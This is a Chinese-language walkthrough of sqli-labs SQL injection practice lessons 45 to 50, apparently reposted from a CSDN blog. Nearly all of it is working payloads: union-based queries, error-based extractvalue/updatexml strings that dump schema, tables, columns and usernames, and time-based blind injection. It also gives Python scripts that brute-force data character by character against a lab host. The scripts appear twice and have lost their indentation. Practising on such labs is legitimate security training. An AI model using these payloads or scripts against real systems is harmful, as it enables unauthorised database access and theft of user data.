45.
登录成功
')union select 1,2,3 #
')union select 1,database(),3 #
')union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 #
')union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 #
')union select 1,(select group_concat(username) from security.users),3 #
46.
1 and(extractvalue(1,concat(0x5c,database())))
1 and(updatexml(1,concat(0x7e,database(),0x7e),1))
1 and(extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security'))))
1 and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))
1 and(extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))))
1 and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1))
1 and(extractvalue(1,concat(0x5c,(select group_concat(username) from security.users))))
1 and(updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1))
47.
1′失败
1‘ –+成功
1“成功
1'and(extractvalue(1,concat(0x5c,database()))) --+
1'and(updatexml(1,concat(0x7e,database(),0x7e),1)) --+
1'and(extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security')))) --+
1'and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)) --+
1'and(extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))) --+
1'and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)) --+
48.
发现页面无报错回显,这里还是order by 无法使用union
1 and if(substr(database(),1,1)='s',sleep(2),0)
用脚本进行爆破
import requests,time
def database():
database_name = ''
charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
while True:
for char in charset:
payload = f"1 and if(substr(database(),{len (database_name) +1},1)='{char}',sleep(2),0) --+"
url = f'http://192.168.1.200:86/Less-48/?sort={payload}'
start_time = time.time()
rsp = requests.get(url)
end_time = time.time()
rsp.time = end_time - start_time
if rsp.time >= 2:
database_name += char
print(f"数据库名称为:{database_name}")
break
else:
break
return database_name
datas = database()
print("最终数据库名称为:",datas)
1 and if(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1)='e',sleep(2),0) --+
def tablename():
table_name =''
charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
while True:
for char in charset:
payload = f"1 and if(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),{len(table_name) +1},1)='{char}',sleep(2),0) --+"
url = f'http://192.168.1.200:86/Less-48/?sort={payload}'
start_time = time.time()
rsp = requests.get(url)
end_time = time.time()
rsp.time = end_time - start_time
if rsp.time >= 2:
table_name += char
print(f"表名称为:{table_name}")
break
else:
break
return table_name
tables = tablename()
print("最终表名称为:",tables)
1 and if(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,1)='i',sleep(2),0) --+
def columnname():
column_name = ''
charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
while True:
for char in charset:
payload = f"1 and if(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),{len(column_name) +1},1)='{char}',sleep(2),0) --+"
url = f'http://192.168.1.200:86/Less-48/?sort={payload}'
start_time = time.time()
rsp = requests.get(url)
end_time = time.time()
rsp.time = end_time - start_time
if rsp.time >= 2:
column_name += char
print(f"列名称为:{column_name}")
break
else:
break
return column_name
columns = columnname()
print("最终列名称为:",columns)
1 and if(substr((select username from security.users limit 1,1),1,1)='a',sleep(2),0) --+
def datas():
data = ''
charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
while True:
for char in charset:
payload = f"1 and if(substr((select username from security.users limit 1,1),{len(data) +1},1)='{char}',sleep(2),0) --+"
url = f'http://192.168.1.200:86/Less-48/?sort={payload}'
start_time = time.time()
rsp = requests.get(url)
end_time = time.time()
rsp.time = end_time - start_time
if rsp.time >= 2:
data += char
print(f"数据为:{data}")
break
else:
break
return data
das = datas()
print("最终数据为:",das)
import requests,time
def database():
database_name = ''
charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
while True:
for char in charset:
payload = f"1 and if(substr(database(),{len (database_name) +1},1)='{char}',sleep(2),0) --+"
url = f'http://192.168.1.200:86/Less-48/?sort={payload}'
start_time = time.time()
rsp = requests.get(url)
end_time = time.time()
rsp.time = end_time - start_time
if rsp.time >= 2:
database_name += char
print(f"数据库名称为:{database_name}")
break
else:
break
return database_name
datas = database()
print("最终数据库名称为:",datas)
def tablename():
table_name =''
charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
while True:
for char in charset:
payload = f"1 and if(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),{len(table_name) +1},1)='{char}',sleep(2),0) --+"
url = f'http://192.168.1.200:86/Less-48/?sort={payload}'
start_time = time.time()
rsp = requests.get(url)
end_time = time.time()
rsp.time = end_time - start_time
if rsp.time >= 2:
table_name += char
print(f"表名称为:{table_name}")
break
else:
break
return table_name
tables = tablename()
print("最终表名称为:",tables)
def columnname():
column_name = ''
charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
while True:
for char in charset:
payload = f"1 and if(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),{len(column_name) +1},1)='{char}',sleep(2),0) --+"
url = f'http://192.168.1.200:86/Less-48/?sort={payload}'
start_time = time.time()
rsp = requests.get(url)
end_time = time.time()
rsp.time = end_time - start_time
if rsp.time >= 2:
column_name += char
print(f"列名称为:{column_name}")
break
else:
break
return column_name
columns = columnname()
print("最终列名称为:",columns)
def datas():
data = ''
charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
while True:
for char in charset:
payload = f"1 and if(substr((select username from security.users limit 1,1),{len(data) +1},1)='{char}',sleep(2),0) --+"
url = f'http://192.168.1.200:86/Less-48/?sort={payload}'
start_time = time.time()
rsp = requests.get(url)
end_time = time.time()
rsp.time = end_time - start_time
if rsp.time >= 2:
data += char
print(f"数据为:{data}")
break
else:
break
return data
das = datas()
print("最终数据为:",das)
49.
和上面比多了’
50.
1 and(extractvalue(1,concat(0x5c,database())))
1 and(updatexml(1,concat(0x7e,database(),0x7e),1))
1 and(extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security'))))
1 and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))
1 and(extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))))
1 and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1))
1 and(extractvalue(1,concat(0x5c,(select group_concat(username) from security.users))))
1 and(updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1))
原文地址:https://blog.csdn.net/qq_61988806/article/details/134707411
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.7code.cn/show_38782.html
如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱:suwngjj01@126.com进行投诉反馈,一经查实,立即删除!
声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。